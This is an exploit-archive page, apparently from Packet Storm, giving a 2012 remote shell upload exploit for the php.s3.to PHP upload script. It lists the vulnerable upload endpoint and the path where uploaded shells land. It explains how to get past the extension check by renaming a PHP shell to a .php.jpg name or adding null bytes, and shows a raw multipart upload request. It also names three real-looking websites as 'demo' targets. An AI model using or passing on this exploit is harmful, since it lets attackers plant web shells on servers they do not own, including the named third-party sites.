exploit the possibilities

php.s3.to Upload Script Shell Upload

php.s3.to Upload Script Shell Upload
Posted Aug 18, 2012
Authored by Mr.XpR

The upload script offered by php.s3.to suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell, php
MD5 | 0c4ff061e0d5708c347933125c556af2

php.s3.to Upload Script Shell Upload

Change Mirror Download
######################################

Explit Title : "PHP S3 TO" Remote File Upload

Download : http://php.s3.to/script.php

Author : MR.XpR

Test on : LinuX R3dH4t

Bug discovered by : IRANHACK SecuRITY TEAM

#####################################

[+] Exploit :

[Protocol]Site.CoM/[dir]/up/upload.php

--------------------------------------------------------------

[+] Load files From :

[Protocol]Site.CoM/[dir]/up/img/Sh3ll.php.jpg

--------------------------------------------------------------

[+] Demo :

http://security2600.sakura.ne.jp/up/upload.php
http://omame.dnsalias.net/up/upload.php
http://diaros.net/up/upload.php

--------------------------------------------------------------

[+] Information :

This Bug Uploading a TxT , PhP , JpG , PNg

change your shell to sh3ll.php.jpg or sh3ll.php%0%0.1.jpg

If Doesn't Work Use Tamper Data FireFox Plugin

--------------------------------------------------------------

[+] Upload Headers :

114782935826962\r\nContent-Disposition: form-data;
name="MAX_FILE_SIZE"\r\n\r\n1048576\r\n-1147829358
26962\r\nContent-Disposition: form-data;name="upfile";
filename="sh3ll.php.jpg"\r\nContent-Type: text/plain\r\n\r\n\r\n
-----------------------------114782935826962\r\nContent-Disposition:
form-data; name="pass"\r\n\r\n\r\n--114782935826962\r\nContent-Disposition:form-data;
name="com"\r\n\r\n\r\n-----------------------------114782935826962--\r\n


[+] Special TnX To :

Mr.XpR - Syamak Black - UnknowN - MR.EBI - Farbod Ezaril - Samim.s
Saman Biliz - Sianor - Cair3x - M.R.S.C.0 - Bl4ck.Viper - Black King
Yaghi vahghi - H3llboy - inj3ct0r - Netqurd - Fixxer- R3ZA BLACK HAT
IRIST - Sokote.vahshat - TBH - IBH - IRH - ArYaIeIrAN - W0lf - Ajax TM
joker_s - mr.4lir3z4 - nimaarek - All iranian Hackerz

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    16 Files
  • 2
    May 2nd
    8 Files
  • 3
    May 3rd
    8 Files
  • 4
    May 4th
    2 Files
  • 5
    May 5th
    1 Files
  • 6
    May 6th
    15 Files
  • 7
    May 7th
    22 Files
  • 8
    May 8th
    16 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    16 Files
  • 11
    May 11th
    3 Files
  • 12
    May 12th
    4 Files
  • 13
    May 13th
    25 Files
  • 14
    May 14th
    24 Files
  • 15
    May 15th
    78 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    12 Files
  • 18
    May 18th
    2 Files
  • 19
    May 19th
    1 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    16 Files
  • 22
    May 22nd
    3 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close